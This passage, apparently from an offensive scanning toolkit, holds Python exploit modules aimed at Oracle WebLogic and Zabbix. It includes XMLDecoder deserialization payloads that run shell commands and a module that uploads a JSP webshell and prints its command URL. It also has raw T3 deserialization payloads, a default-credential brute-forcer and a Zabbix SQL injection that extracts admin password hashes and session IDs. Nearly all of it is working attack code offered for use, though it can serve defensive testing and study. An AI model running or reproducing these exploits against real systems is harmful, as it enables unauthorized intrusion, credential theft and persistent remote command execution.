https://mp.weixin.qq.com/s?__biz=MzA4MDk3NzQ2OA==&mid=2454386939&idx=1&sn=2201c2986bba691c97833703ab38ee6a&chksm=882253a8bf55dabe9287d189b6eab43835fb5e11d573409818bd53c03449695da1299cdaaa7f&scene=0&xtrack=1&key=2b014a6820a1af4646355cdad083dd430a0a72940aaabd4c5d122740e2e70fe4311cf3b26341a5c67db5680b48dbb2cc9929bb2c752762eefc55cbbe9dce6687e4ab70f7680a5d816dfca875600660b6&ascene=1&uin=ODcyMzk1NTA2&devicetype=Windows+10&version=62060739&lang=zh_CN&pass_ticket=3hixJwwmL0fh6mFu2UWxBuGjTXpTeFPr%2F%2FQhP2o2XMuWI9I%2BWoiRKbL5OwDvGfou 41 | https://mp.weixin.qq.com/s?__biz=MzUyNTk1NDQ3Ng==&mid=2247484258&idx=1&sn=f2213aec957aeb577c2d8f25bca2edd6&chksm=fa177fa1cd60f6b7634c1502b81a03c081827e9c3edb6151d75119433eafa91b080ce5549bf5&scene=0&xtrack=1&key=58a327fab9b03b4d45c412094df8e30eb0c8121282d89468600594c7b8c0bac551026570f083017558e66e639c43d0bad25d83481ed6e3122cf8f32c49b070a883b6f41e8b7f52597921748516633fe3&ascene=1&uin=ODcyMzk1NTA2&devicetype=Windows+10&version=62060739&lang=zh_CN&pass_ticket=3hixJwwmL0fh6mFu2UWxBuGjTXpTeFPr%2F%2FQhP2o2XMuWI9I%2BWoiRKbL5OwDvGfou 42 | 43 | ''' 44 | 45 | headers = {'Content-type': 'text/xml'} 46 | uri = '/wls-wsat/CoordinatorPortType' 47 | linux_poc = ''' 48 | 49 | demoAction 50 | hello 51 | 52 | 53 | 54 | 55 | 56 | /bin/sh 57 | 58 | 59 | -c 60 | 61 | 62 | %s 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | ''' 75 | win_poc = ''' 76 | 77 | demoAction 78 | hello 79 | 80 | 81 | 82 | 83 | 84 | cmd 85 | 86 | 87 | /c 88 | 89 | 90 | %s 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | ''' 103 | 104 | 105 | def attack(URL): 106 | print('[*]开始检测-Weblogic-CNVD-C-2019-48814。[*]') 107 | cmd = str('whoami') 108 | base64cmd=base64.b64encode(cmd.encode('utf-8')) 109 | linux_poccmd = 'echo %s|base64 -d|bash' % base64cmd.decode('utf-8') 110 | linux_poc2 = linux_poc % linux_poccmd 111 | win_poc2 = win_poc % cmd 112 | url2 = URL + '/_async/AsyncResponseService' 113 | try: 114 | r1 = requests.post(url2,headers=headers,data=linux_poc2,timeout=7) 115 | r2 = requests.post(url2,headers=headers,data=win_poc2,timeout=7) 116 | if r1.status_code == 202 or r2.status_code == 202: 117 | print('[+]发现 CNVD-C-2019-48814! 请使用exp确认。') 118 | print('[*]检测结束-Weblogic-CNVD-C-2019-48814。[*]') 119 | print('\n') 120 | else: 121 | print('[-]未发现 CNVD-C-2019-48814!') 122 | print('[*]检测结束-Weblogic-CNVD-C-2019-48814。[*]') 123 | print('\n') 124 | except requests.ReadTimeout: 125 | print('[-]未发现 CNVD-C-2019-48814! Read timeout') 126 | print('[*]检测结束-Weblogic-CNVD-C-2019-48814。[*]') 127 | print('\n') 128 | except Exception: 129 | print('[-]未发现 CNVD-C-2019-48814! some error') 130 | print('[*]检测结束-Weblogic-CNVD-C-2019-48814。[*]') 131 | print('\n') 132 | 133 | if __name__ == '__main__': 134 | attack() -------------------------------------------------------------------------------- /weblogic/CVE_2017_10271.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import sys 3 | import requests 4 | import time 5 | from random import * 6 | import string 7 | 8 | 9 | 10 | ''' 11 | Usage: 12 | moon.py -u weblogic http://127.0.0.1:7001 13 | Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0 14 | Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。 15 | 访问:http://域名:默认weblogic端口/wls-wsat/CoordinatorPortType ,如果存在相关内容则存在漏洞 16 | ''' 17 | 18 | def gen_shell(): 19 | min_char = 4 20 | max_char = 12 21 | allchar = string.ascii_letters + string.digits 22 | shell_name = "".join(choice(allchar) for x in range(randint(min_char, max_char))) 23 | return shell_name 24 | 25 | 26 | def attack(URL): 27 | print('[+]开始检测-Weblogic-CVE-2017-10271。[+]') 28 | shellname = gen_shell() 29 | data = """ 30 | 31 | 32 | 33 | 34 | 35 | servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/"""+shellname+""".jsp 36 | 37 | "); 44 | while((a=in.read(b))!=-1){ 45 | out.println(new String(b)); 46 | } 47 | out.print(""); 48 | } 49 | %> 50 | ]]> 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | """ 60 | url = f'{URL}/wls-wsat/CoordinatorPortType' 61 | #proxies = {'http': 'http://localhost:8080', 'https': 'http://localhost:8080'} 62 | headers = {"Content-Type":'text/xml', 63 | "User-Agent":'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'} 64 | try: 65 | r = requests.post(url,data=data, headers=headers) 66 | print('上传返回值为500为成功。上传返回值为:' + str(r.status_code)) 67 | try: 68 | r1 = requests.get(f'{URL}/bea_wls_internal/{shellname}.jsp') 69 | if r1.status_code == 200: 70 | print(f'webshell地址为:{URL}/bea_wls_internal/{shellname}.jsp?pwd=fff&cmd=whoami') 71 | else: 72 | print('获取shell失败。') 73 | except: 74 | print('获取shell失败。') 75 | except Exception: 76 | print('访问网页失败,未发现-Weblogic-CVE-2017-10271。') 77 | 78 | print('[+]检测结束-Weblogic-CVE-2017-10271。[+]') 79 | print('\n') 80 | 81 | if __name__ == "__main__": 82 | attack() -------------------------------------------------------------------------------- /weblogic/CVE_2017_3506.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # auther:dayu 3 | import requests 4 | import re 5 | 6 | heads = { 7 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0', 8 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 9 | 'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3', 10 | 'Content-Type': 'text/xml;charset=UTF-8' 11 | } 12 | 13 | 14 | def attack(url): 15 | if not url.startswith("http"): 16 | url = "http://" + url 17 | if "/" in url: 18 | url += '/wls-wsat/CoordinatorPortType' 19 | post_str = ''' 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | /bin/bash 28 | 29 | 30 | -c 31 | 32 | 33 | whoami 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | ''' 44 | 45 | print('[+]开始检测-Weblogic-CVE-2017-3506。[+]') 46 | try: 47 | response = requests.post( 48 | url, data=post_str, verify=False, timeout=5, headers=heads) 49 | response = response.text 50 | response = re.search( 51 | r"\.*\<\/faultstring\>", response).group(0) 52 | except Exception: 53 | response = "" 54 | 55 | if 'java.lang.ProcessBuilder' in response or "0" in response: 56 | print('[+]发现 CVE-2017-3506 !!!') 57 | else: 58 | print('[-]未发现 CVE-2017-3506 ') 59 | print('[+]检测结束-Weblogic-CVE-2017-3506。[+]') 60 | print('\n') 61 | 62 | 63 | if __name__ == '__main__': 64 | attack() 65 | -------------------------------------------------------------------------------- /weblogic/CVE_2018_2628.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # 原作者: xxlegend 3 | import socket 4 | import time 5 | import re 6 | import sys 7 | 8 | VUL=['CVE-2018-2628'] 9 | #remote ip changed to :127.0.0.1 10 | PAYLOAD=['ACED0005737D00000001001D6A6176612E726D692E61637469766174696F6E2E416374697661746F72787200176A6176612E6C616E672E7265666C6563742E50726F7879E127DA20CC1043CB0200014C0001687400254C6A6176612F6C616E672F7265666C6563742F496E766F636174696F6E48616E646C65723B78707372002D6A6176612E726D692E7365727665722E52656D6F74654F626A656374496E766F636174696F6E48616E646C657200000000000000020200007872001C6A6176612E726D692E7365727665722E52656D6F74654F626A656374D361B4910C61331E03000078707729000A556E69636173745265660000000005A2000000005649E3FD00000000000000000000000000000078'] 11 | #remote ip:104.251.228.50 12 | #PAYLOAD=['aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707737000a556e6963617374526566000e3130342e3235312e3232382e353000001b590000000001eea90b00000000000000000000000000000078'] 13 | VER_SIG=['\\$Proxy[0-9]+'] 14 | 15 | def t3handshake(sock,server_addr): 16 | sock.connect(server_addr) 17 | sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')) 18 | time.sleep(1) 19 | sock.recv(1024) 20 | print 'handshake successful' 21 | 22 | def buildT3RequestObject(sock,port): 23 | data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371' 24 | data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(dport)) 25 | data3 = '1a7727000d3234322e323134' 26 | data4 = '2e312e32353461863d1d0000000078' 27 | for d in [data1,data2,data3,data4]: 28 | sock.send(d.decode('hex')) 29 | time.sleep(2) 30 | print 'send request payload successful,recv length:%d'%(len(sock.recv(2048))) 31 | 32 | def sendEvilObjData(sock,data): 33 | payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000' 34 | payload+=data 35 | payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' 36 | payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload) 37 | sock.send(payload.decode('hex')) 38 | time.sleep(2) 39 | sock.send(payload.decode('hex')) 40 | res = '' 41 | try: 42 | while True: 43 | res += sock.recv(4096) 44 | time.sleep(0.1) 45 | except Exception as e: 46 | pass 47 | return res 48 | 49 | def checkVul(res,server_addr,index): 50 | p=re.findall(VER_SIG[index], res, re.S) 51 | if len(p)>0: 52 | print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index]) 53 | else: 54 | print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index]) 55 | 56 | def run(dip,dport,index): 57 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 58 | ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整 59 | sock.settimeout(65) 60 | server_addr = (dip, dport) 61 | t3handshake(sock,server_addr) 62 | buildT3RequestObject(sock,dport) 63 | rs=sendEvilObjData(sock,PAYLOAD[index]) 64 | # print 'rs',rs #本地测试的时候这里有个奇怪的报错 65 | checkVul(rs,server_addr,index) 66 | 67 | if __name__=="__main__": 68 | dip = sys.argv[1] 69 | dport = int(sys.argv[2]) 70 | print 'Test Address:', dip, dport 71 | try: 72 | run(dip,dport,0) 73 | except: 74 | print(dport,dip,'is not vul.') 75 | -------------------------------------------------------------------------------- /weblogic/Common_page.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import requests 3 | 4 | ''' 5 | Usage: 6 | moon.py -u weblogic http://127.0.0.1:8080 7 | 用来查看weblogic常见的4个页面 8 | ''' 9 | 10 | def attack(URL): 11 | urls = ( 12 | '/console/login/LoginForm.jsp', 13 | '/wls-wsat/CoordinatorPortType', 14 | '/_async/AsyncResponseService', 15 | '/ws_utc/config.do' 16 | ) 17 | 18 | print('[+]开始检测-Weblogic-common_page。[+]') 19 | user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 20 | headers={"User-Agent":user_agent} 21 | for url in urls: 22 | url = URL + url 23 | try: 24 | verify_response = requests.get(url, headers=headers) 25 | 26 | if verify_response.status_code == 200: 27 | try: 28 | print('[*]页面返回状态码:'+str(verify_response.status_code)+' '+'页面返回大小为:'+str(len(verify_response.text))+' '+url) # 因为部分网站设置了统一的404页面,造成误报,因此添加返回长度来进行辅助判断 29 | except Exception: 30 | pass 31 | else: 32 | print('未发现页面:'+url) 33 | continue 34 | except Exception: 35 | print("[-]访问页面出错!") 36 | print('[+]检测结束-Weblogic-common_page。[+]') 37 | print('\n') 38 | 39 | if __name__ == "__main__": 40 | attack() 41 | -------------------------------------------------------------------------------- /weblogic/Main_weblogic.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import os 3 | import re 4 | import weblogic.CVE_2019_2725 5 | import weblogic.CVE_2017_10271 6 | import weblogic.ssrf 7 | import weblogic.weblogic_weakpasswd 8 | import weblogic.CNVD_C_2019_48814 9 | import weblogic.CVE_2017_3506 10 | import weblogic.Common_page 11 | 12 | 13 | def exec(URL): 14 | weblogic.Common_page.attack(URL) 15 | weblogic.CNVD_C_2019_48814.attack(URL) 16 | weblogic.CVE_2017_10271.attack(URL) 17 | weblogic.ssrf.attack(URL) 18 | weblogic.weblogic_weakpasswd.attack(URL) 19 | weblogic.CVE_2019_2725.attack(URL+'/') 20 | weblogic.CVE_2017_3506.attack(URL) 21 | 22 | print('[+]开始检测-Weblogic-CVE-2018-2628。[+]') 23 | # 切换工作路径 24 | os.chdir(os.path.realpath(__file__)[:38]) 25 | url = re.findall('//(.*?):', URL, flags=0)[0] 26 | ip = re.findall(r':(.*?)\Z', URL[6:], flags=0)[0] 27 | os.system(f"py -2 CVE_2018_2628.py {url} {ip}") 28 | print('[+]检测结束-Weblogic-CVE-2018-2628。[+]') 29 | 30 | 31 | if __name__ == "__main__": 32 | exec() 33 | -------------------------------------------------------------------------------- /weblogic/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- -------------------------------------------------------------------------------- /weblogic/ssrf.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | import requests 4 | 5 | ''' 6 | Usage: 7 | moon.py -u weblogic http://127.0.0.1:7001 8 | weblogic version: 10.0.2,10.3.6 9 | 修复:uddiexplorer 删除该目录下的文件,或者做权限配置,禁止对外访问。 10 | 如果可登陆,可在 Setup UDDI Explorer 处获得明确的内网IP 11 | ''' 12 | def attack(URL): 13 | print('[+]开始检测-Weblogic-ssrf-CVE-2014-4210。[+]') 14 | 15 | url = f'{URL}/uddiexplorer/' 16 | headers = {"Content-Type":'text/xml', 17 | "User-Agent":'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'} 18 | try: 19 | r = requests.get(url, headers=headers) 20 | if r.status_code == 200: 21 | print("存在weblogic-ssrf漏洞页面:"+url) 22 | else: 23 | print("[-]未发现漏洞页面。") 24 | except requests.exceptions.ConnectionError: 25 | print('[-]访问页面出错!') 26 | print('[+]检测结束-Weblogic-ssrf-CVE-2014-4210。[+]') 27 | print('\n') 28 | 29 | 30 | if __name__ == "__main__": 31 | attack() 32 | -------------------------------------------------------------------------------- /weblogic/weblogic_weakpasswd.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import requests 3 | 4 | 5 | ''' 6 | Usage: 7 | moon.py -u tomcat http://127.0.0.1:8080 8 | 爆破weblogic用户名账户密码。 9 | ''' 10 | 11 | def attack(URL): 12 | print('[+]开始检测-weblogic-weak_pawsswd漏洞。[+]') 13 | 14 | #设定用于爆破的账户密码 15 | a = 0 16 | accounts = ['guest','WebLogic', 'weblogic', 'Oracle@123', 'system', 'Administrator', 'admin', 'security', 'joe', 'wlcsystem', 'wlpisystem','portaladmin','mary'] 17 | passwds = ['guest','weblogic1','WebLogic', 'weblogic', 'Oracle@123', 'password', 'system', 'Administrator', 'admin', 'security', 'joe','wlcsystem', 'wlpisystem','passwd','portaladmin'] 18 | for account in accounts: 19 | for passwd in passwds: 20 | url = URL + '/console/j_security_check' 21 | user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 22 | headers = {"User-Agent": user_agent} 23 | data = {'j_username':account,'j_password':passwd,'j_character_encoding':'UTF-8'} 24 | try: 25 | r = requests.post(url,headers=headers,data=data, verify=False) 26 | if 'Oracle WebLogic Server Administration Console' in r.text: 27 | pass 28 | elif 'Home Page - base_domain - WLS Console' in r.text: 29 | print('登录页面'+url) 30 | print('[+]发现弱口令:'+account+' '+passwd+'漏洞检测结束!') 31 | a = 1 32 | else: 33 | pass 34 | # print('[-]爆破发生错误,请检查网页是否可访问!') 35 | except: 36 | print('[-]访问weblogic登录页面出错,漏洞检测结束!') 37 | if a == 0: 38 | print('[-]检测结束未发现weblogic-weak_pawsswd弱口令。[-]') 39 | else: 40 | pass 41 | print('\n') 42 | 43 | if __name__ == "__main__": 44 | attack() -------------------------------------------------------------------------------- /zabbix_vuln/Authentication_Bypass.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import requests 3 | 4 | ''' 5 | Usage: 6 | moon.py -u zabbix http://127.0.0.1:8080 7 | 相关链接:https://cxsecurity.com/issue/WLB-2019100030 8 | 这个漏洞的话,姑且看看吧。测试的时候手里环境不是很全,可能有问题,上面原始脚本是perl的,可以试一下 9 | 影响范围:Zabbix <= 4.4 10 | The target is vulnerable. Try to open these links: 11 | https://TARGET/zabbix/zabbix.php?action=dashboard.view 12 | https://TARGET/zabbix/zabbix.php?action=dashboard.view&ddreset=1 13 | https://TARGET/zabbix/zabbix.php?action=problem.view&ddreset=1 14 | https://TARGET/zabbix/overview.php?ddreset=1 15 | https://TARGET/zabbix/zabbix.php?action=web.view&ddreset=1 16 | https://TARGET/zabbix/latest.php?ddreset=1 17 | https://TARGET/zabbix/charts.php?ddreset=1 18 | https://TARGET/zabbix/screens.php?ddreset=1 19 | https://TARGET/zabbix/zabbix.php?action=map.view&ddreset=1 20 | https://TARGET/zabbix/srv_status.php?ddreset=1 21 | https://TARGET/zabbix/hostinventoriesoverview.php?ddreset=1 22 | https://TARGET/zabbix/hostinventories.php?ddreset=1 23 | https://TARGET/zabbix/report2.php?ddreset=1 24 | https://TARGET/zabbix/toptriggers.php?ddreset=1 25 | https://TARGET/zabbix/zabbix.php?action=dashboard.list 26 | https://TARGET/zabbix/zabbix.php?action=dashboard.view&dashboardid=1 27 | ''' 28 | 29 | def attack(URL): 30 | urls = ( 31 | '/zabbix.php?action=dashboard.view', 32 | '/zabbix.php?action=dashboard.view&ddreset=1', 33 | '/zabbix.php?action=problem.view&ddreset=1', 34 | '/overview.php?ddreset=1', 35 | '/zabbix.php?action=web.view&ddreset=1', 36 | '/latest.php?ddreset=1', 37 | '/charts.php?ddreset=1', 38 | '/screens.php?ddreset=1', 39 | '/zabbix.php?action=map.view&ddreset=1', 40 | '/srv_status.php?ddreset=1', 41 | '/hostinventoriesoverview.php?ddreset=1', 42 | '/hostinventories.php?ddreset=1', 43 | '/report2.php?ddreset=1', 44 | '/toptriggers.php?ddreset=1', 45 | '/zabbix.php?action=dashboard.list', 46 | '/zabbix.php?action=dashboard.view&dashboardid=1' 47 | ) 48 | 49 | print('[+]开始检测- Zabbix 4.2 - Authentication Bypass。[+]') 50 | user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 51 | headers={"User-Agent":user_agent} 52 | for url in urls: 53 | url = URL + url 54 | try: 55 | verify_response = requests.get(url, headers=headers) 56 | 57 | if verify_response.status_code == 200 or 304 or 401: 58 | try: 59 | print('页面返回状态码:'+str(verify_response.status_code)+' '+'页面返回大小为:'+str(len(verify_response.text))+' '+url) # 因为部分网站设置了统一的404页面,造成误报,因此添加返回长度来进行辅助判断 60 | except Exception: 61 | pass 62 | else: 63 | continue 64 | except Exception: 65 | print("Someerror!") 66 | print('[+]检测结束-Zabbix 4.2 - Authentication Bypass。[+]') 67 | print('\n') 68 | 69 | if __name__ == "__main__": 70 | attack() 71 | -------------------------------------------------------------------------------- /zabbix_vuln/Main_zabbix.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import zabbix_vuln.zabbix_sql_CVE_2016_10134 3 | import zabbix_vuln.Authentication_Bypass 4 | 5 | 6 | def exec(URL): 7 | zabbix_vuln.zabbix_sql_CVE_2016_10134.attack(URL) 8 | zabbix_vuln.Authentication_Bypass.attack(URL) 9 | 10 | 11 | if __name__ == "__main__": 12 | exec() 13 | -------------------------------------------------------------------------------- /zabbix_vuln/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- -------------------------------------------------------------------------------- /zabbix_vuln/zabbix_sql_CVE_2016_10134.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import re 3 | import requests 4 | 5 | ''' 6 | Usage: 7 | moon.py -u zabbix http://x.x.x.x:xx 8 | zabbix的 profileIdx2 参数存在问题,存在sql注入。 9 | 影响范围,3.0.3 成功, 3.2.6 失败。 10 | 禁用guest账户,升级版本 11 | ''' 12 | 13 | 14 | def attack(URL): 15 | print('[+]开始检测-zabbix_sql-CVE-2016-10134。[+]') 16 | user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 17 | headers={"User-Agent":user_agent} 18 | url = URL + "/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=999'&updateProfile=true&screenitemid=.=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1" 19 | try: 20 | res = requests.get(url,headers=headers) 21 | xresponse = res.text 22 | print('访问URL成功,开始进行zabbix_sql注入漏洞检测。') 23 | except Exception: 24 | print('[-]未发现zabbix_sql注入漏洞。') 25 | else: 26 | try: 27 | url = URL + "/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(select 1 from(select count(*),concat((select (select (select concat(0x7e,(select concat(name,0x3a,passwd) from users limit 0,1),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)&updateProfile=true&screenitemid=.=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1" 28 | res = requests.get(url, headers=headers) 29 | response = res.text 30 | result_reg = re.compile(r"Duplicate\s*entry\s*'~(.+?)~1") 31 | results = result_reg.findall(response) 32 | print('管理员、用户名密码为:'+results[0]) 33 | except Exception: 34 | print('[-]获取用户名及密码失败。') 35 | try: 36 | url = URL + "/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(select 1 from(select count(*),concat((select (select (select concat(0x7e,(select sessionid from sessions limit 0,1),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)&updateProfile=true&screenitemid=.=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1" 37 | res = requests.get(url, headers=headers) 38 | response = res.text 39 | result_reg = re.compile(r"Duplicate\s*entry\s*'~(.+?)~1") 40 | results = result_reg.findall(response) 41 | print('SessionID为:' + results[0]) 42 | except Exception: 43 | print('[-]获取SessionID失败。') 44 | print('[+]检测结束-zabbix_sql-CVE-2016-10134。[+]') 45 | print('\n') 46 | 47 | 48 | if __name__ == '__main__': 49 | attack() 50 | --------------------------------------------------------------------------------